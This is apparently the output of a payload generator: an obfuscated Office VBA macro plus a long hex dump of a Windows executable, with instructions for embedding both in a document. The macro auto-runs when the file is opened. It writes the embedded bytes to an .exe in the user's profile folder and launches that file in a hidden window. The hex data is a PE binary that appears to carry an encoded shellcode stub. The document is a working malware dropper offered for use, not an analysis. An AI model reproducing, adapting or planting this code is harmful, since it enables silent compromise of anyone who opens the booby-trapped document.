'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
	Jklzu12
End Sub

Sub Jklzu12()
	Dim Jklzu7 As Integer
	Dim Jklzu1 As String
	Dim Jklzu2 As String
	Dim Jklzu3 As Integer
	Dim Jklzu4 As Paragraph
	Dim Jklzu8 As Integer
	Dim Jklzu9 As Boolean
	Dim Jklzu5 As Integer
	Dim Jklzu11 As String
	Dim Jklzu6 As Byte
	Dim Wzuzzerqgf as String
	Wzuzzerqgf = "Wzuzzerqgf"
	Jklzu1 = "SsXsThTeJ.exe"
	Jklzu2 = Environ("USERPROFILE")
	ChDrive (Jklzu2)
	ChDir (Jklzu2)
	Jklzu3 = FreeFile()
	Open Jklzu1 For Binary As Jklzu3
	For Each Jklzu4 in ActiveDocument.Paragraphs
		DoEvents
			Jklzu11 = Jklzu4.Range.Text
		If (Jklzu9 = True) Then
			Jklzu8 = 1
			While (Jklzu8 < Len(Jklzu11))
				Jklzu6 = Mid(Jklzu11,Jklzu8,4)
				Put #Jklzu3, , Jklzu6
				Jklzu8 = Jklzu8 + 4
			Wend
		ElseIf (InStr(1,Jklzu11,Wzuzzerqgf) > 0 And Len(Jklzu11) > 0) Then
			Jklzu9 = True
		End If
	Next
	Close #Jklzu3
	Jklzu13(Jklzu1)
End Sub

Sub Jklzu13(Jklzu10 As String)
	Dim Jklzu7 As Integer
	Dim Jklzu2 As String
	Jklzu2 = Environ("USERPROFILE")
	ChDrive (Jklzu2)
	ChDir (Jklzu2)
	Jklzu7 = Shell(Jklzu10, vbHide)
End Sub

Sub AutoOpen()
	Auto_Open
End Sub

Sub Workbook_Open()
	Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Wzuzzerqgf
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H84&H34&HB4&H37&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDD&HC4&HD9&H74&H24&HF4&H5D&HBA&HB1&H5D&H40&H45&H33&HC9&H66&HB9&H04&H02&H31&H55&H1A&H03&H55&H1A&H83&HC5&HB5&HBF&HB5&H74&H75&H57&H3E&H67&H35&HA8&H5A&H78&H85&HCC&H2B&HA6&H5E&HD1&HA7&H47&H07&H37&H74&H5E&H33&HEC&H8F&H39&H92&H25&HDE&HEC&HD5&HED&H32&H12&H4D&H1D&HB6&HFC&H4C&H48&HAD&HA7&HBF&H66&H1B&HF3&H7E&HE7&HFB&HBD&H70&H99&H00&H3F&HD2&HBB&H46&H78&H5C&H75&H54&HFA&HA5&H3A&HD3&H71&H4B&H30&H09&HCF&HFC&H9C&H1C&HED&HF1&HD4&H9C&H30&H3F&HE3&HF6&H73&HB4&HE7&H63&HE6&H0E&H90&H9B&H7B&HEF&H62&H0D&H52&HD6&H4F&HBC&H6B&HA1&HA2&H0F&H33&H33&HCE&H62&HD6&H74&H6A&H98&H6A&HFE&HF4&H48&H65&H80&H8A&H96&H5B&H33&H0C&H1C&H40&HAB&H80&H37&H20&H6D&H08&HD8&H41&HC4&HC2&HEB&H04&HE2&H2D&H7D&HB4&H84&H35&HA3&H1F&HD7&H7F&H13&HB5&H64&H59&HE8&HBF&HED&H1F&H1E&H4E&H42&H6D&H88&H8F&H96&H92&H0A&HCA&HC9&H40&HAF&H89&H30&HD1&HB2&H8D&H1C&H70&H74&H39&H2A&HFB&H80&H2B&HA8&HB0&H42&H7D&H7E&H6D&HEC&H27&H9E&HD6&H16&H23&H16&HDB&HCD&HCE&H7F&HF9&HDB&H13&H1E&HB4&HCB&H76&H71&H0A&HE3&H00&HB0&H77&H3D&HA3&HB8&H74&H25&HA3&H9A&H73&HD5&H64&HFC&H44&HC2&H55&H5C&HFB&HE5&HB6&HB5&H5D&H5E&HA6&HFC&HD4&H79&H09&H87&H3F&H8A&H82&H01&H58&H8A&HA6&HB0&H69&HC1&H12&H41&HE3&HF1&HE1&H43&H12&H2C&H63&HE6&H5B&H19&H75&HDF&H0C&H3E&H97&H5D&HB0&HF3&HCD&HCD&H4D&H02&HDE&HA1&HA3&H10&H8C&H42&H4E&H34&H73&H7F&H40&HDF&H55&H37&H36&H0B&H2D&HBF&H95&H10&H7C&HFB&HBF&H1A&HDF&HC7&HD9&HB9&HB4&H03&H28&H47&H45&H1C&H2F&HBC&H40&HA6&H04&H2D&HD1&H5A&H0D&H7C&HD4&HA0&H99&HF4&HB9&H59&H97&HF3&HAF&HA0&H98&HDA&HF0&HCB&HA2&H6C&HB0&H62&H03&HFF&H21&H75&H8C&H5D&HBE&H94&H02&H29&HF7&H3F&HF9&HCB&H3C&HB7&HA6&HDB&HDF&H53&H04&HAB&HE6&H7C&H93&H6B&H5F&H4A&H0C&H5B&H7D&H83&H64&H80&H9D&HE5&H8A&HDC&HF3&H30&H1F&H4C&H5D&H4E&HA8&H82&HBD&H20&H3D&H60&HDF&HB9&H60&HFD&HD7&HFE&H66&H1C&H33&H5D&H5C&HEE&H11&HC2&HD7&H37&HB1&HD3&H5D&HF3&HE7&H27&HFF&H90&H9F&HFA&H66&H9B&H02&H0C&HFB&H8E&H1D&HC1&HB8&H2C&H20&HB8&H33&H71&H85&HFC&HDA&H01&HA5&H6A&H19&HA5&H70&H98&H16&HCC&H36&HDD&H1A&H83&H49&H70&H78&HA1&HEC&HFB&H06&H7D&HFC&H6F&H5B&H66&HC7&H66&H9F&HA4&HD9&H93&HF7&HCF&HFA&H83&HD2&H18&HDB&H06&H80&H42&HA2&H5E&H88&HC1&HAF&HC6&HC0&H39&H66&H16&HA5&H17&H70&H07&H37&HF9&H23&H3F&H3E&HAF&H24&HE3&H6E&H00&H1F&HA0&H53&H7D&HAD&HBE&H60&H26&H7D&HDA&H9A&H67&HAF&H6B&HFD&H70&H61&H63&H1E&H68&HB2&H1F&H30&HFA&HE7&HB5&HD0&H04&H96&H41&H24&H0E&H63&H57&H45&H23&HB3&HC9&H3B&H06&HE3&H6E&HB3&HB4&H6D&HC0&H96&H6E&H48&HD4&H7A&HC4&H99&HFC&HB0&H61&HB6&HB9&H03&H36&H0E&H3D&H2A&H6B&HCD&HF9&HD0&H20&HEE&H7A&HD7&H40&H91&H11&HC8&HE8&H46&HE6&H6F&HE0&HBF&H64&H3B&H68&H2B&H0A&H19&H8D&H88&H6A&HE6&H22&HDD&HF9&H09&H40&HB4&H45&HDE&H57&H2B&HE1&HEF&HD4&HFA&HD5&H69&H1D&HBC&H4B&H98&HFA&HC2&HD7&H9D&HDE&H91&HEA&H23&H87&HF9&HB9&HCD&H55&H65&H93&HEB&H56&HB1&H92&H31&HB2&HA5&H15&H68&H3C&H58&H44&HAE&H64&H10&HAF&H34&H2E&HAF&HE6&H20&HD1&H10&H8D&H89&HDB&H06&H7C&HBA&H62&HB6&H21&HF6&HE4&HF8&H8B&H1B&HF9&H8F&H97&HA6&H21&HC0&HE1&H2B&HE6&HB6&HCD&H7B&H95&H16&H9C&H6B&H04&H8B&HDB&H28&HF1&H88&H06&H7E&H8C&H86&H0E&HF1&HC0&H4C&H45&H2E&H17&HFE&HBF&H36&H7F&HC0&HA6&HC1&H31&H13&H93&HB4&H56&HF2&HDA&H9B&H64&H14&H84&HB2&H27&H8F&HB1&HC7&H78&H9D&H3F&HD5&HE8&HA4&H33&H5C&H5B&H14&HDD&H56&H49&HEB&HCA&HBC&H6F&H81&H19&H16&H07&H34&H8A&H19&H84&H84&H0E&HC4&HB0&H91&HE8&H3C&HC9&HC3&H12&HF7&H77&H3B&HEA&HA9&HB8&HD7&H24&H77&H09&HA6&H6A&H5A&H42&HD4&HB2&H74&H63&H08&H98&HF0&HBB&HBD&H16&HBC&H62&HE4&H2B&H77&H95&H63&H7F&H6F&HB8&H4D&HB7&HD4&HA9&HA9&H2E&HC8&H44&H1B&H89&H81&HB0&HC1&H86&H41&H5B&HFA&H78&H15&H7E&H13&H77&H04&H1F&H60&H16&H2C&HA1&H4B&HA7&HE5&H9F&H4F&H35&H9A&H79&HEB&H08&HEC&HE5&HBB&HDE&H97&HB3&H94&H9D&H5C&H82&H9D&H0D&HBF&H93&H9E&H6A&H9B&HE0&H7F&HA6&H6F&HE3&HD2&H00&H34&HCE&HD9&H65&H9E&HFC&H25&H4A&H8B&H98&HCC&HE3&HD5&HB5&H40&H72&HA0&HD4&H5F&HE9&HBA&HAE&HE0&HF7&HE6&HE6&HF2&H4F&H83&HB0&H4D&H3E&H6C&H3A&HE7&HC0&HF2&H86&H1A&H46&HA7&HC0&H5B&H64&HDF&H2B&HB8&H1B&HFF&H84&H33&HDA&H4A&H33&H59&HF7&H48&HD5&H03&H63&HF0&H09&H0A&HFA&HAA&HBB&HF3&HE6&HAF&H11&H27&HDD&H6E&H40&H29&HC7&H5F&HF3&H8D&H2F&H6E&H5E&H24&H2C&H93&H88&H7B&HF2&HF1&HD0&H57&HA0&H17&HC9&H47&HA9&H42&HE9&H10&HF6&H1F&HCA&HC3&HA9&HDB&HF2&H85&H4C&H86&H75
&HB3&HC8&H45&H9A&H95&H64&HE0&H0F&H68&HC5&H2E&HE0&H96&H0A&H6F&H52&H38&HB6&HFA&H3A&HF6&HD1&H71&HA8&H9F&HA8&H7F&HE1&H07&HA3&H6C&H25&H96&HB2&HCF&H15&H27&HF5&H24&H2F&HA1&H77&H11&H7C&HB0&H94&HD6&H22&HEF&H71&H9C&H54&H93&H0C&H19&H6F&HC3&H40&H98&HCE&HA0&H66&HEE&HE3&H9C&H0F&H13&H07&H41&H65&H86&H25&HEC&H8C&H6A&H5A&H2E&HB6&HF9&HA7&H03&H5F&H51&H26&H15&HD9&H9F&H3B&HCA&HF5&H07&H18&HF1&H5C&H0E&HDA&H73&H7B&HBD&H5E&H30&H6B&H4A&HE7&H84&H3C&H77&HE6&HED&H46&H69&H75&HB1&H93&HD3&H89&H95&H63&H99&H34&H70&H7C&H37&HCD&HF1&HB1&H17&H5B&H36&HF7&H98&H0B&HAF&HA6&H04&H04&H17&HCA&H33&H0D&HFB&H78&H53&HC9&H83&H97&HE4&H50&H3E&HA1&H8C&HAC&H8D&H1D&H4A&H03&H9F&H5F&H50&HCF&H63&H62&HB3&H93&H47&H18&H9E&HA9&H6B&HA8&H4F&HDE&HE5&H4B&HA5&HAB&H92&H66&H30&H86&HBF&HD4&HCD&H1A&HEB&HB8&H4B&H72&H15&H97&H61&HCA&HC7&HFD&H36&H62&H61&H41&HD2&HDF&HB4&H03&H8F&HF1&H46&HB8&HB6&HDC&H28&H0A&H73&H57&H8D&HBF&H0A&HAA&H61&HCE&H4F&HC2&H30&HAA&H5B&H09&H6B&H88&HDC&H38&HE2&HBB&HCA&HE9&HA2&HE0&H31&H27&H06&HD7&HEE&H5B&H21&H87&HE5&HC7&HEE&H81&H25&H4D&H26&H02&H32&HA6&HF1&H1A&HBB&HF0&HEB&H62&H51&HBD&H46&H71&H4E&H27&H5C&HA0&H96&H42&H7B&HC6&HBE&HF9&H5E&HCE&HD0&HBA&H93&HCF&HE8&H35&HEE&H4F&HEA&H30&HD6&HD0&H09&H2D&H51&H75&H91&H60&HB4&H0B&H7B&HB3&HC7&H92&H0C&H1D&HD1&H00&H2C&H64&H40&H29&H18&HB8&HC6&H99&H2D&H88&H2D&H6F&HE5&HB1&HE8&HFE&H03&H35&H22&H08&HF1&H5E&HB1&H90&H89&HD4&HA6&H50&HD0&HDA&H1F&H61&HD1&H31&H60&H1B&HE4&HC1&H14&HBD&H07&H4D&HD6&H3C&H65&HF9&H22&H2B&H5E&H75&H73&H22&HA9&H7F&H39&H15&HD8&H20&HFF&H65&HC3&HBB&HA5&H60&HE7&HFF&H2B&HFD&H5A&HE0&H74&H86&H9F&H28&H3B&H0A&H84&H33&H4F&HAF&H53&H66&H5A&HE3&HC9&H7E&HBE&HCF&H45&H17&H6E&H52&H43&H50&H8D&HE5&H7C&HAC&H6C&H2F&HB2&HDF&HC4&H5B&HB6&H53&HE0&H66&H87&H21&H3C&H5A&HA2&H10&H0D&H1C&H7F&H45&H56&H67&H7F&H0F&H75&H68&H15&H6C&H12&HB7&H9A&H68&H4A&H89&H47&H5E&H14&HA4&H30&H59&H78&H10&H31&HF6&H76&HA5&HA7&H75&H5A&HE9&H08&HDA&H27&H99&HAF&HD7&HDF&HA8&HEE&HA1&HC4&H94&H15&H1C&H7C&H2F&HFA&HC3&H32&H62&H43&H6D&HA5&HB3&H48&H7F&HFC&H3A&H92&HD3&H03&H4A&HBC&H67&HDB&H03&HD1&H24&H51&H2A&H88&H66&HF3&H36&H1C&HE2&H7D&HCD&H7F&H81&H47&HDB&H04&H7D&HEB&H68&H90&H47&H28&H09&HCE&H03&HBE&H73&HBB&H3B&H33&HB1&H9A&HF8&H58&H3B&H1D&H13&H41&H0E&H2A&HA9&H71&H53&H07&H6E&HA3&HF8&H8B&H2F&H8F&H21&HA6&H8C&H53&H5B&HF4&H94&HF0&H74&H27&H44&H87&H2D&H93&HC7&HCB&HE3&H10&HAD&HA3&HBE&H89&HB4&HC8&H3B&HA6&H01&HDA&H5D&HB8&HC7&HE2&HDC&H6A&HC8&H4F&H3E&HC8&H62&H1E&HE5&H21&H45&HC5&H18&H5D&H2B&HF9&H12&H21&HEE&HE4&H07&HAF&H52&H9E&H3E&H74&H66&H5F&HE8&H3B&H70&H8C&HBE&H78&HAA&HF8&H63&HDA&HB7&H18&H40&H4F&H1E&HDB&HFE&H44&HA9&H92&HF4&H21&H4A&H11&H7F&HB4&H22&H05&HFB&HC1&HC0&H5B&HC7&HBC&HD2&H18&HC9&H08&HF7&H0E&H81&HE1&H80&H96&H90&H00&H65&H01&H80&HDA&HB3&H6E&H53&HFF&H94&H90&HAC&H85&H61&HD6&HA9&H64&H2E&H5A&HFC&HFD&HA2&HA4&H34&H16&H24&HE1&HCA&H0B&H10&H02&H79&HBB&H34&HED&HC9&HD5&H2A&H0E&HA8&HF4&HCB&H6F&HD7&H46&HD8&H9F&H23&HF8&H6A&HA4&H18&H6F&H6A&H01&H45&H3F&H86&H89&H43&H57&HCA&HE0&HAD&HA4&H31&HB8&H5D&H10&H57&HAA&H42&H4D&H00&H8F&H91&H02&HDB&H7F&HA6&HD6&HAB&H69&H4D&H56&H64&H04&H39&H8B&H28&H72&HC9&H7E&H94&H06&H35&H10&H91&HE2&H33&H9D&H91&HB7&HDF&HBE&H25&HF3&HF2&H6B&HE7&H08&H20&H09&HD6&HF5&H94&H69&HAF&H47&H52&H27&HEA&HF9&H87&H29&HD8&H68&H95&H25&H8F&H45&H3C&HA4&HE3&H92&HA7&H39&HCD&H14&H94&H02&H98&H99&H72&HFD&H43&H68&HBB&H8E&H7A&H29&H25&H18&HC5&H08&H30&H9C&HDF&H63&HE6&H92&HD6&H84&H7E&H2A&HE5&H8C&H38&H8F&H72&H94&HD9&H3C&H37&HAD&H61&H6F&H51&H43&H1C&H75&H4A&HC5&H6B&HDC&H13&H2B&HB9&H89&H4E&H48&H91&HAC&H5E&H29&HFD&H47&H7C&H0A&HDC&HE0&H57&H61&H31&HC8&HCA&HA9&H15&H1A&H68&H80&HA6&HD9&H76&H56&H27&H2B&H35&HF8&HF6&HD0&HDC&HAB&HDA&H88&H39&H93&H5B&HE0&H3D&H9C&HBD&H03&HF7&H98&H00&H79&H40&HCA&H5E&H9B&H5F&HB7&HBF&HA2&HBD&HA5&HFD&H0D&HB1&H8A&H4D&H82&H91&HFB&H89&H95&H12&H66&H76&H7A&HC2&H06&HCF&H63&HD9&HB7&HE7&H20&H37&HF9&HAC&H06&HCB&HC3&HFA&HC5&H3E&HC2&HD0&H52&H60&HC8&HFD&HCA&HD8&H72&H8D&HFD&H4B&H4D&HEA&H39&H4D&HFC&H0F&H47&H2F&H15&HD1&HE2&H01&HBD&H61&H1B&H2C&H4D&HF1&H2A&HE4&H76&H26&HB4&H02&H17&H01&HCD&HAB&HB6&H1D&H78&H98&H9C&H7E&H54&HB3&H70&H5D&HFA&HF2&H39&HAB&H19&HA6&H7B&H65&H98&H53&HE0&H65&HC5&H85&H6F&HA8&H13&H44&HE7&H1D&H07&HA7&H4B&H27&H08&HE5&HA2&H07&HD8&H90&H27&H13&HA9&H7A&HE1&H3C&H92&H64&H00&H12&H22&H98&H44&H33&H1A&H98&HDD&HDC&HC6&H01&HCA&HAE&H23&H13&HC3&H22&HC8&HBC&HF8&H7B&H19&H95&H0A&HAF&H53&H59&HFD&H82&H22&HF6&HB0&HE4&H79&H39&H60&H04&H44&HE2&H71&HE1&H7D&H20&HD3&HB0&HF0&HE0&HC5&HF6&H53&HE9&H13&HEF&H6F&H48&H60&H0A&H1A&H47&H83&H88&H7C&H57&HEC&H2A&H4E&H06&HD0&H3B&H35&HD5&H09&H7D&H05&H35&H85&HBD&H39&H50&H22&HEA&H14&HB7&H32&H1F&H24&H16&HDC&HE0&H43&HC0&HB5&H15&H1C&H6A&H22&H63&H14&H7F&HD0&H05&HAF&H55&HEE&HC9&H15&H6B&HCB&HDC&H51&HD0&HA1&HCE&HE4&HCD&H69&H15&HAD&H40&H0B&HCA&H03&H8C&HFB&H02&HA0&H66&H7C&H91&H34&H70&HC0&H71&H55&H20&H0F&H42&H64&H14&H43&H02&HD4&H51&HDB&HC0&HD4&H9F&H54&HA7&H72&H93&H73&H47&H2B&H4E&H79&H6E&HFE&H23&H53&HD8&H98&HAE&H77&H33&HA8&H98&H17&H8B&H39&H83&H2C&H04&HF7&HB7&H6B&H92&H64&HCA&HBB&HD8&H0B&HFE&H59&H2E&HBD&HA6&H0E&H71&HB3&H95&H8F&HE3&H78&H7D&HFE&HEE&H9E&HC0&H08&H27&H3B&H96&H82&H56&H3A&HFB&H44&H49&HD5&H3C&HB2&H1D&HB4&H58&HE1&HCC&H3C&H12&H67&HA1&HF7&H92&H68&HD0&H0C&HE5&H9B&HAC&H51&H04&H8D&H64&H66&HFC&HDD&H5A&H15&HEB&HBD&H45&H24&HD8&HF2&H4C&H3E&HC3&H6A&HF6&H2F&H44&HE6&HA9&H5F&HD0&H0B&H4D&H43&H2E&HBC&H2D&H36&H42&H26&H42&HA4&H0A&HA3&H7F&H8A&H54&H1B&HD6&HE9&HB2&H25&H07&HEA&H2E&H82&H03&H15&H51&H8A&H1B&H68&H6C&H38&H50&HBF&H33&H2D&H0F&HB1&HE4&H68&H9F&H79&HFB&H7C&H30&HA2&H13&H8A&H1B&HFD&H06&HB2&H71&H08&HBA&H90&H42&HAB&H28&HAB&HD8&H9C&H96&H26&H24&H3F&HB8&H4F&H57&H25&HCC&HD5&H45&HE3&H23&H79&H3D&HC2&HBF&HB0&H57&HC5&H1E&H42&HDB&HFE&H84&H2A&H08&H89&H5B&HD0&H97&H40&H49&H1E&HFE&H8F&HD4&H5A&H15&H18&HE9&H97&H9B&H09&H18&HB7&HD2&H4A&H45&H19&H63&H92&H06&H27&HFF&H75&H41&H43&HE4&H2B&H10&H8E&H51&HEF&HCA&H47&H47&H8C&H40&H74&H28&HBA&H1A&HB5&H40&HD3&H38&H37&HCB&H81&H1A&H3C&H2E&H8F&H68&H83&H45&H25&H89&HDF&H02&H9C&H3F&H4B&HE8&H75&H90&HE6&H0B&HAF&HD5&H87&HEF&HD3&H7B&HBF&H90&HDC&H76&HE9&H6A&HE1&HA0&HCA&H05&HFE&HAF&H07&H3C&H68&HAD&H0D&H2E&HE7&H5A&HF5&H8A&H02&HFB&H5C&H1F&H37&H28&HA5&H7E&HF9&HF4&H35&H17&H21&H90&H23&HB6&H44&HC2&HD0&H32&HD5&HA6&HE2&H08&HE4&H48&H83&H97&H93&HAE&HBB&H50&H4F&HB4&HCA&H72&HFC&HD7&H48&H6C&HAB&H49&HF2&HF7&H3C&H7E&HB3&HA9&H28&HF6&HFD&H10&H7E&H36&H28&H23&HA6&H89&H14&H5C&H99&H13&H4F&HCB&H4E&H4E&HAD&HF9&HB9&H7D&H55&HD3&H8C&H8D&H80&H8C&H89&H47&H09&H81&HD8&HCC&H64&H48&HA9&HB1&HE0&HA6&HD4&H2B&H6F&H64&H2D&HB5&H12&HA6&H47&H5F&HE0&HFD&H32&HA5&HA2&H36&HFF&H69&H77&HFF&HE3&HF2&H93&H6D&H0B&H40&H4E&HF2&H8F&H10&HFA&HF7&H3F&H77&HE2&H79&HED&H5D&H43&H30&HA5&H53&H0E&HAE&HAD&HA8&H09&HB8&H9A&H50&HBF&HDC&H82&H4F&H16&H7B&H59&H1B&HC8&HD7&H1D&H26&H83&H62&H84&H51&H6E&HBF&HD8&HD3&H44&H3D&HCE&HA1&H5A&H24&H21&H17&H20&H06&H3A&H55&HAE&H36&H72&H9D&H48&H69&HB0&HD7&H87&H53&H9A&H15&H5C&HD1&HEF&H91&H95&H81&HE8&H68&H3D&H1B&H7F&H65&H94&HE8&H1C&H04&H08&HBC&H15&H0E&H93&H22&H56&HE8&HEC&HA0&H7F&H41&HD4&H18&H28&H7F&HAD&H8B&HE9&H3A&H1A&H24&H71&H63&HDF&HE2&H68&HBA&H49&HB1&H61&H58&H9D&H9B&HE6&H2A&HAF&H59&HA1&H7B&H06&HA8&H9E&H19&H54&HB4&HC7&HA9&HCC&H19&HDF&HA8&H44&H25&HC5&H29&H13&H17&HC0&HB7&H04&H7B&H7E&H39&H89&H52&H67&H78&HC8&H77&H6E&HDA&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
